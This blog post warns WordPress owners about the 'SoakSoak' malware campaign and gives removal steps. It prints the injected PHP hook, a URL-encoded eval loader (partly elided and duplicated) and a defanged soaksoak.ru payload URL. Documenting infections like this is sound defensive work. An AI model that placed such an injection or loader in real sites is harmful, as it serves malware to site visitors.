The users of WordPress, a free and open source blogging tool as well as content management system (CMS), are being informed of a wides pread malware attack campaign that has already compromised more than 100,000 websites worldwide and still counting.
Earlier Sunday morning, news broke throughout the WordPress community regarding a widespread malware attack that has already comprised over 100,000 websites and counting. This harmful malware campaign has been brought forth by SoakSoak.ru thus being dubbed the ‘SoakSoak Malware’ epidemic. Those affected by the virus may be experiencing erratic site behavior including unexpected redirects to SoakSoak.ru web pages along with the potential for automatic downloads of malicious files to visitor’s computers without consent. Google has already been on top of this infection and has added over 11,000 websites to their blacklist that could have a serious effect on the revenue potential for those site owners. The infections aren’t targeted strictly at WordPress sites, but it appears this is the largest platform that has been infected. According Sucuri, a WordPress security solution, the exact method of intrusion has not been pinpointed at this time although several signals led them to believe many WordPress users could have fallen victim to a recent vulnerability in the premium Slider Revolution plugin If you’re a site owner and worried about the potential risk of infection to your own website, head over to Free SiteCheck scanner to see whether you are in the clear or if the malware has already burrowed its way into your site.
(Sucuri – SoakSoak – SiteCheck)
SoakSoak Malware Anatomy
It is modifying the filewp-includes/template-loader.php and including this content:
<?php
function
FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts",
'FuncQueueObject');
This causes the wp-includes/js/swobject.js to be loaded on every page you view on the site which includes the malware here:function
FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts",
'FuncQueueObject');
eval(decodeURIComponent
("%28%0D
%0A%66
%75%6E
%63%74
%69%6F
%6E%28
%29%0D
%0A%7B
%0D%..72
%69%70
%74%2E
%69%64
%3D%27
%78%78
%79%79
%7A%7A
%5F%70
%65%74
%75%73
%68%6F
%6B%27
%3B%0D
%0A%09
%68%65
%61%64
%2E%61
%70%70
%65%6E
%64%43
%68%69
%6C%64
%28%73
%63%72
%69%70
%74%29
%3B%0D
%0A%7D
%28%29
%0D%0A
%29%3B"));
This malware when decoded loads a javascript malware from the SoakSoack.ru domain, specifically this file:("%28%0D
%0A%66
%75%6E
%63%74
%69%6F
%6E%28
%29%0D
%0A%7B
%0D%..72
%69%70
%74%2E
%69%64
%3D%27
%78%78
%79%79
%7A%7A
%5F%70
%65%74
%75%73
%68%6F
%6B%27
%3B%0D
%0A%09
%68%65
%61%64
%2E%61
%70%70
%65%6E
%64%43
%68%69
%6C%64
%28%73
%63%72
%69%70
%74%29
%3B%0D
%0A%7D
%28%29
%0D%0A
%29%3B"));
hxxp://soaksoak.ru/xteas/code
How Remove SoakSoak Malware?
Currenty, there's no removal procedure yet to be found. Howere, we have listed the some steps to bring it down.
1. If you have installed a theme, template, or any plugin from SoakSoak.ru remove it immediately.
2. If you've hosted your WordPress site to any other hosting service, check there all you files and look for the above mentioned codes that cause the site infection.
3. If you believe you had never visited the SoakSoak.ru but you are observing unfamiliar behaviour of your WordPress site, login to you site then expand the widget templete and look for above mentioned codes and remove them.
4. When yo finish the step 1 and step 2 and 3, go back to Free SiteCheck scanner and scan it again to know whether your site is okay or not.
Love this article?Share it with your friends on Facebook
No comments :
Post a Comment
Are you avid to share your views? Go ahead and will be highly appreciated. Put your valuable comment that will help us to publish more worthy posts and content.